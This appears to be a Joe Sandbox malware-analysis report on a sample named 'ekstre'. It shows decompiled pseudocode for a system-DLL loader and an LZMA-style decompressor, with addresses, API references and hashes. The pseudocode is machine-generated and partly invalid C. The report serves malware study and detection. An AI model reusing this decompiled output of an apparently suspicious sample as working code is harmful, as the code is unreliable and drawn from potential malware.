Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: 8fB$<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83$hA
API String ID: 1092082344-2920809617
Opcode ID: 4f59a052f93578e4edbbc217162d5af8593342674c3933440a0e1626f7b444ad
Instruction ID: fbc15916fd798e890252dfa94d77e606639a9ce4decfb061337eb3c4842bfdd2
Opcode Fuzzy Hash: 4f59a052f93578e4edbbc217162d5af8593342674c3933440a0e1626f7b444ad
Instruction Fuzzy Hash: 41318F76510205EFDB249F6AEE448663BACF75431AB91853FE900B22F0C7749D41DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

UXTHEME, xrefs: 004069CE
%s%S.dll, xrefs: 00406A11
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
